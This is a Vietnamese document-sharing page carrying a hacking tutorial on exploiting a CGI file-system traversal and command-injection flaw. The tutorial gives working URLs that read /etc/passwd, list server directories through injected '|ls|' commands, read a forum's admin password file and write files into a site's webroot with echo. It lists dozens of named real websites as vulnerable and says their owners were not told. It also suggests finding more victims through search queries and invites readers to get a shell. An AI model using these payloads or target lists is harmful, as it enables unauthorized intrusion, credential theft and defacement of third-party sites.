Tìm kiếm tài liệu miễn phí

Web Hacking

.Web Hacking, Brief Introduction :  trang này đã được đọc  lần  Trong thời đại hiện nay khi internet được phổ biến rộng rãi, các tổ chức, cá nhân đều có



Đánh giá tài liệu

4.7 Bạn chưa đánh giá, hãy đánh giá cho tài liệu này


Web Hacking Web Hacking Kỹ thuật hack, tài liệu hacker, lý thuyết hacker, tự học hacker, hacker căn bản
4.7 5 2293
  • 5 - Rất hữu ích 1.682

  • 4 - Tốt 611

  • 3 - Trung bình 0

  • 2 - Tạm chấp nhận 0

  • 1 - Không hữu ích 0

Mô tả

  1. .Web Hacking, Brief Introduction :  trang này đã được đọc  lần  Trong thời đại hiện nay khi internet được phổ biến rộng rãi, các tổ chức, cá nhân đều có  nhu cầu giới thiệu thông tin của mình trên xa lộ thông tin cũng như thực hiện các cuộc giao  dịch buôn bán online. Vấn đề nảy sinh là khi phạm vi ứng dụng của các web application  ngày càng phổ biến thì khả năng xuất hiện lỗi và bị tấn công càng cao. Trong các lĩnh vực  hacking, hack web application là sân chơi khá lý thú cho những ai yêu thích computer  security.  Thông thường, những bước cơ bản khi thực hiện hack web bao gồm như sau ­ các bước  này không nhất thiết phải thực hiện tuần tự mà tùy vào điều kiện của chúng ta.  1. Thu thập thông tin ở mức trên về hạ tầng của mục tiêu  Bước này ta cần thu thập một số thông tin quan trọng như có bao nhiêu server, mô hình  của các web server, các client nào sẽ tương tác với ứng dụng web, kiểu giao tiếp thông tin  (transport) và thông qua các cổng (port) nào, những site liên quan đến việc thực hiện chức  năng của site mục tiêu....  2. Khảo sát ứng dụng web  Ở đây tôi chỉ mô tả một trong những phương pháp khảo sát khá phổ biến từ trước đến giờ,  đó là Xem mã nguồn và lợi dụng các lỗi cho phép xem mã nguồn.Một số ngôn ngữ web  thông dụng hiện nay có nhiều lỗi này như Active Server Pages (ASP),Common Gateway  Interface (CGI), ColdFusion Server (CFM), Hypertext Preprocessor (PHP).  Bài viết này tôi chỉ đề cập đến 1 bug đã có từ lâu nhưng thấy vẫn còn nhiều site mắc phải,  đó là lỗi liên quan đến CGI  design cho phép view source và file system traversal. Hãy  xem ví dụ sau:  http://www.earthdayalliance.org/index.cgi?page=contact.htm Ở đây index.cgi được gọi với tham số truyền vào là trang contact.htm (HTML file) nó sẽ  đọc và hiện nội dung của trang này lên client browser. Tuy nhiên nếu người viết cgi không  kiểm tra kĩ lưỡng, ta có thể lợi dụng để xem chính nội dung của file index.cgi hay các trang  khác. Ví dụ sau ta sẽ thay contact.htm bằng index.cgi:  http://www.earthdayalliance.org/index.cgi?page=index.cgi  Ở đây ta gặp 1 thông báo lỗi "error: No such file or directory  /web/guide/earthdayalliance/www/content/index.cgi", nguyên nhân là thực tế index.cgi  không nằm trong thư mục hiện hành (tức là ../www/content/) mà nằm ở www, do đó ta sẽ  chỉnh lại link 1 chút bằng 1 dot dot slash, như sau:  http://www.earthdayalliance.org/index.cgi?page=/../index.cgi  Chạy link này ta sẽ thấy nội dung của index.cgi được show trên browser. Việc xem được  source có thể giúp ta tìm hiểu kĩ càng hơn về web app, thậm chí nếu may mắn có thể xem  được những thông tin quan trọng khác. Lệnh sau là 1 ví dụ dùng lỗi này để xem file  etc/passwd trong unix server:  http://www.earthdayalliance.org/index.cgi?page=/../../../../../../../../../etc/passwd 
  2. Đây chỉ là 1 ví dụ nhỏ, còn khai thác hay hạn chế thế nào thì tùy khả năng của mỗi người.  Các bạn có thể tìm các site bị lỗi này bằng cách dùng www.google.com, search từ khóa  liên quan, chẳng hạn như: "index.cgi?page="  Đây là vài link tôi tìm thấy, các bạn có thể tham khảo:  http://www.discountdata.com/index.cgi?page=index.cgi  http://home.no.net/danm2/freezeware/index.cgi?page=leecher.html  http://home.no.net/danm2/freezeware/index.cgi?page=/../../../../../../../../etc/passwd  http://itf.fys.kuleuven.ac.be/workshop2002/index.cgi?page=practical.htm  http://itf.fys.kuleuven.ac.be/workshop2002/index.cgi?page=/../../../../../../etc/passwd  http://www.resource.nl/uk/index.cgi?page=index.cgi  http://www.earthdayalliance.org/index.cgi?page=contact.htm  http://www.earthdayalliance.org/index.cgi?page=/../index.cgi  http://www.earthdayalliance.org/index.cgi?page=/../../../../../../../../../etc/passwd  http://www.nestingeagles.com/index.cgi?page=videoB.htm  http://www.nestingeagles.com/index.cgi?page=/../index.cgi  http://www.nestingeagles.com/index.cgi?page=/../../../../../../etc/passwd  http://www.warehousejewelry.com/cgi­bin/index.cgi?page=Privacy_Policy.htm  http://www.warehousejewelry.com/cgi­bin/index.cgi?page=/../index.cgi  http://www.warehousejewelry.com/cgi­bin/index.cgi?page=/.././admin/configuration.pl  http://www.warehousejewelry.com/cgi­bin/index.cgi?page=/../../../../../../../etc/passwd  http://demo1.secmod.com/index.cgi?page=links.html  http://demo1.secmod.com/index.cgi?page=index.cgi  http://demo1.secmod.com/index.cgi?page=/../../../../../etc/passwd  http://www.vintagejournal.com/VJ0901/index.cgi?page=/../index.cgi  http://www.vintagejournal.com/VJ0901/index.cgi?page=home.htm  http://www.datadart.com/commercesql/index.cgi?page=STK%20Datasheets.html&car  http://www.datadart.com/commercesql/index.cgi?page=/../index.cgi  http://www.gatlinburggateway.com/index.cgi?&page=/../../../../../../etc/passwd  http://www.berkshire­is.com/index.cgi?page=news.html  http://www.berkshire­is.com/index.cgi?page=index.cgi  http://www.berkshire­is.com/index.cgi?page=/../../../../../etc/passwd  http://www.smokymtnarts­crafts.com/index.cgi?page=otto.htm  http://www.smokymtnarts­crafts.com/index.cgi?page=/../index.cgi  http://www.textileflags.com/cgi­bin/rock_flag_store/index.cgi?page=flagsbyname.html  http://www.textileflags.com/cgi­bin/rock_flag_store/index.cgi?page=/../index.cgi  http://www.randalloglegallery.com/index.cgi?page=about.htm  http://www.randalloglegallery.com/index.cgi?page=/../index.cgi  .....  Lưu ý các site trên chưa được thông báo về lỗi này.  3. Tấn công các web server  4. Tấn công vượt qua các cơ chế kiểm soát (authentication, authorization)  Bao gồm các phương pháp như đoán mật khẩu, làm việc ­ thay đổi thông tin cookies, các  kĩ thuật directory traversal, leo thang đặc quyền, các phương pháp tấn công dựa vào SQL,  SQL injection... 
  3. 5. Tìm hiểu sâu về các chức năng của ứng dụng web  Tìm hiểu cách thực hiện của các phần trong ứng dụng, đặc biệt như các order input,  confirmation, order tracking. Ở đây ta có thể áp dụng các phương pháp như SQL Injection,  input validation...  6. Tìm hiểu luồng di chuyển của thông tin  Các thông tin tương tác giữa client và server, các thông tin tương tác với database. Hiện  nay việc viết mã để thực hiện việc giao tiếp thông tin thường phải đảm bảo được tính hiệu  quả (nhanh),và bảo mật (có thể sẽ chậm hơn). Thường thì tính hiệu quả được ưu tiên hơn  do đó có thể sẽ phát sinh lỗi trong quá trình đó và giúp hacker có thể lợi dụng các lỗi như  SQL input...để đoạt quyền điều khiển hệ thống.  7. Tấn công trang của người quản lý hệ thống  8. Tấn công client  9. Thực hiện tấn công từ chối dịch vụ Denial­of­Service (DoS)  Đây là cách cuối cùng khi các phương pháp trên không thực hiện thành công.  Phần này cần các bạn có kiến thức chút đỉnh về Unix.  Bước tiếp theo là khai thác khả năng command execution từ client browser thông qua  HTTP port. Ở đây các bạn chú ý các kí tự đặc biệt hữu ích khi ta cần thực hiện lệnh trong URL, đó là:  newline character (%0a), pipe (%7c), semicolon (%3b), ampersand (%26). Newline char  cho phép ta ngắt các lệnh ra thành nhiều dòng khi thực hiện, dùng khi ta kết nhiều lệnh  cùng trên cùng 1 dòng; pipe dùng để kết nối nhiều lệnh unix với nhau, tương tự với  semicolon; ampersand thường dùng để ngăn cách các tham số truyền vào câu lệnh...Các  bạn tự tìm hiểu kĩ hơn các thông tin này.  Tiếp theo vd ở post đầu, đó là: http://www.earthdayalliance.org/index.cgi? page=contact.htm  Bây giờ ta thử gọi 1 lệnh liệt kê thông tin thư mục của unix (ls):  http://www.earthdayalliance.org/index.cgi?page=|ls|  Ta sẽ thấy browser liệt kê ra các file, thư mục có trong thư mục hiện hành của trang web,  đại khái như sau:  [badurl.htm contact.txt content count_file edcpressrelease.htm greentemplate.htm  guestbook images index.cgi newtemplate.htm registercircle.txt search.html template.htm  templates welcome.htm wwwboard ]  Nếu muốn biết rõ hơn về thông tin của file, như quyền hạn, ngày tháng...ta dùng lệnh ls  ­la, cụ thể URL sẽ là:  http://www.earthdayalliance.org/index.cgi?page=|ls+­la| Một vd của việc khai thác tiếp theo: ta thấy thư mục wwwboard, đây là 1 dạng webforum  đơn giản, ta xem thử nội dung thư mục này:  http://www.earthdayalliance.org/index.cgi?page=|ls%20wwwboard| 
  4. Ở đây ta sẽ thấy liệt kê ra content của forum này, trong đó có 1 file passwd.txt, ta muốn  xem nội dung file này, chỉ việc thực hiện:  http://www.earthdayalliance.org/index.cgi?page=/../wwwboard/passwd.txt  Lưu ý ta thêm /../ phía trước vì muốn lùi 1 cấp trở về thư mục cha.  Thế là bạn vừa xem được pass admin của forum dạng này.  Đây là 1 thông tin tìm hiểu khác:  http://www.earthdayalliance.org/index.cgi?page=|ls%20/../../../../../etc+­la|  Liệt kê các user trong server này:  http://www.earthdayalliance.org/index.cgi?page=|ls+/../../.././web/guide+­al|  .....  Bước khai thác kế tiếp dành cho các bạn: Thực hiện nhiều câu lệnh, get shell... Chúc  thành công.  Các công cụ có thể áp dụng trong web hacking các bạn có thể tìm hiểu ở trang:  http://www.hackingexposed.com/tools/tools.html  Một tài liệu nhỏ về web hacking khác (đây là tài liệu English, đọc bằng chương trình  Microsoft  powerpoint trong bộ Microsoft Office): webhacking.zip  Tôi sẽ giới thiệu các bạn 1 thủ thuật nho nhỏ để tạo 1 file dạng text khi ta có thể run được   command trên remote server. Cách này có thể áp dụng với cả nt và unix. Với NT, tôi đã  từng thực hiện thành công khi hack các server hosting controller trước đây, khi đó tôi dùng  cách này để tạo 1 file script ftp, sau đó gọi lệnh ftp để chạy script này.  Ở đây tôi sẽ nêu ví dụ tạo 1 link cho site bị lỗi CGI File System Traversal tôi đã post.  Các bạn theo dõi link sau: http://www.nestingeagles.com/index.cgi?page=/../../../../../../etc/passwd ,  ta sẽ thấy nó liệt kê ra nội dung của file passwd (đã shadowed). Vì site này có tên là  nestingeagles.com nên tôi sẽ search "nestingeagles" trong list vừa liệt kê trong passwd, ta  sẽ thấy:  ....  marlonsand:*:354:102:,,,,:/mnt/web/guide/turboprofits:/bin/false  bibscalp:*:356:102:,,,,:/mnt/web/guide/bibscalpproducts:/bin/suspended  nestingeagle:*:357:102:,,,,:/mnt/web/guide/nestingeagles:/bin/bash  twostr:*:359:102:,,,,:/mnt/web/guide/twostreetmusic:/bin/suspended  srinc:*:361:102:,,,,:/mnt/web/guide/summationresearch:/bin/false  ....  Ta chú ý đến đường dẫn của website này: : /mnt/web/guide/nestingeagles, từ đây ta sẽ  dùng lệnh ls để xem nó, như sau:
  5. http://www.nestingeagles.com/index.cgi?page=|ls %20/../../../../mnt/web/guide/nestingeagles| ,  nó sẽ liệt kê các thông tin về thư mục và file của site này, tìm hiểu thêm ta sẽ biết được  main index của site nằm trong /wwwfp/, ta lại liệt kê: http://www.nestingeagles.com/index.cgi? page=|ls%20/../../../../mnt/web/guide/nestingeagles/wwwfp| . Ok, bây giờ ta có thể thực  hiên các lệnh tạo, xóa...main index của website trong thư mục này. Ta sẽ thử tìm cách tạo  link a.htm.  Lệnh tôi giới thiệu ở đây là echo. Lệnh echo sẽ hiện 1 message ra standard output hoặc ra  file.  Command dùng trong trường hợp này như sau: echo [message] >> [filename], nếu  muốn thêm vào file có sẵn, bạn chỉ việc gọi tiếp lệnh echo với file đã có, nhưng với  message (nội dung) khác.  http://www.nestingeagles.com/index.cgi?page=|echo%20This+is+a|test%20>> %20/../../../../ mnt/web/guide/nestingeagles/wwwfp/a.htm|  Nếu thành công, bạn sẽ thấy link sau: http://www.nestingeagles.com/a.htm  Bây giờ các bạn thấy lệnh echo hữu dụng thế nào rồi chứ, ta có thể tạo link mà chẳng cần  tool gì remote cả ngoại trừ browser.  Lưu ý các bạn khi test nên tránh dùng các lệnh xoá dữ liệu hoặc tạo file đè mất các  file người ta có sẵn, cũng đừng nên quá lạm dụng lệnh để tạo nhiều link sẽ sớm bị  phát hiện.                          Error! Unknown switch argument.

Tài liệu cùng danh mục An ninh - Bảo mật

Mã hóa ổ đĩa Windows bằng DiskCryptor

Mã hóa ổ đĩa Windows bằng DiskCryptor Việc mã hóa các tài liệu giúp bạn bảo mật được thông tin nếu máy tính bị mất hay bị đánh cắp. Tuy nhiên không nên dừng lại ở việc chỉ mã hóa các tài liệu nhạy cảm bởi lẽ kẻ trộm hoàn toàn có thể khôi phục được mật khẩu và các thông tin nhạy cảm khác được lưu bởi Windows. Thậm chí bạn bảo vệ bằng mật khẩu cho tài khoản Windows của mình thì các file hệ thống của bạn vẫn có thể bị truy cập một cách dê dàng,...


Chapter 3 : Đặc tính và các kiểu tường lửa PIX Cisco

Đặc tính và các kiểu tường lửa PIX Cisco


Giáo trình hướng dẫn 5 cách khóa an toàn địa chỉ email của bạn khi có dấu hiệu bị xâm nhập p10

Tiện ích Windows Media Player 11 có giao diện hợp lý, với khả năng lựa chọn thư viện đơn giản, nút điều khiển lớn và màu sắc sáng (giống với iTunes, Hình 5). Tiện ích quản lý hình ảnh Windows Photo Gallery mới áp dụng cùng giao diện để xem hình ảnh, đơn giản hóa việc in ảnh, ghi lên đĩa DVD hay thực hiện slide-show trên máy tính. Hiện giờ, Windows Movie Maker có thể ghi phim lên đĩa DVD nhờ chương trình Windows DVD Maker ...


HHS_en07_Attack_Analysis

Tham khảo tài liệu 'hhs_en07_attack_analysis', công nghệ thông tin, an ninh - bảo mật phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả


Thêm một cách hack Local Site

.Thêm một cách hack Local Site trang này đã được đọc  lần  Ví dụ vè hack phpBB.. 100% thành công.  Bước 1. Xác định URL website cần hack.


Ethical hacking and countermeasures - phần 56

Tham khảo tài liệu 'ethical hacking and countermeasures - phần 56', công nghệ thông tin, an ninh - bảo mật phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả


Google Hacking 101

A Google bomb or Google wash is an attempt to influence the ranking of a given site in results returned by the Google search engine. Due to the way that Google's Page Rank algorithm works, a website will be ranked higher if the sites that link to that page all use consistent anchor text.


Hướng dẫn sử dụng hosting miễn phí Byethost (Phần 2)

Ở bài trước Thủ Thuật 24h đã hướng dẫn các bạn đăng ký 1 tài khoản hosting trên Byethost rồi, bài viết này sẽ tiếp tục hướng dẫn các bạn sử dụng cơ bản hosting miễn phí tốt nhất hiện nay này Để vào trang quản lý hosting các bạn vào địa chỉ này http://panel.byethost.com.


Diệt virus và gián điệp (spyware) bằng... tay không

Tham khảo bài viết 'diệt virus và gián điệp (spyware) bằng... tay không', công nghệ thông tin, an ninh - bảo mật phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả


Lecture Network security: Chapter 14 - Dr. Munam Ali Shah

This chapter includes contents: We will explore block ciphers and stream ciphers with some examples, second dimension of the cryptography, what is fesitel structure and why is it used will also be part of today’s lecture, importantly, we will discuss data encryption standard (DES).


Tài liệu mới download

Quyết định số: 199/QĐ-BYT
  • 09/11/2015
  • 23.102
  • 946
Giáo trình 3DS Max 9.0: Phần 2
  • 03/07/2018
  • 53.460
  • 919

Từ khóa được quan tâm

Có thể bạn quan tâm

wifi security phần 4
  • 11/11/2011
  • 20.603
  • 425
Hacking the art of exploitation
  • 25/03/2014
  • 71.663
  • 473
Module 07 System Hacking
  • 25/01/2013
  • 67.386
  • 511
Tools for Security Testing
  • 09/09/2009
  • 91.569
  • 555
Chương 7 " Bảo mật web"
  • 23/05/2013
  • 30.240
  • 538
Hacking for newbies
  • 22/07/2010
  • 16.872
  • 544

Bộ sưu tập

Danh mục tài liệu